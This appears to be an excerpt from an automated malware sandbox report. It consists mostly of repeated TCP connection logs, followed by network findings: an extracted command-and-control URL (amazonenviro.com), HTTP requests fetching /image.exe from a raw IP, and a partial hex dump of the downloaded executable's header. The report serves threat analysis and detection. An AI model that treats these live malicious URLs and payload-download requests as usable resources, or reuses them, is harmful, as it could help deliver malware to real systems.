            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80

            Networking

            barindex
            Source: Malware configuration extractorURLs: http://amazonenviro.com/245_Aiymwhpjxsg
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290E72C InternetCheckConnectionA,7_2_0290E72C
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 07 Jan 2025 08:16:47 GMTAccept-Ranges: bytesETag: "65d1a17edc60db1:0"Server: Microsoft-IIS/8.5Date: Fri, 10 Jan 2025 07:58:54 GMTContent-Length: 1161216Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 12 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 6e 26 00 00 00 20 08 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 e8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 57 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 c4 06 00 00 10 00 00 00 c6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 48 08 00 00 00 e0 06 00 00 0a 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 1f 00 00 00 f0 06 00 00 20 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 ec 36 00 00 00 10 07 00 00 00 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 6e 26 00 00 00 50 07 00 00 28 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 80 07 00 00 00 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 07 00 00 02 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 7c 00 00 00 a0 07 00 00 7e 00 00 00 1e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 0a 00 00 20 08 00 00 1c 0a 00 00 9c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 00 00 00 00 00 00 b8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
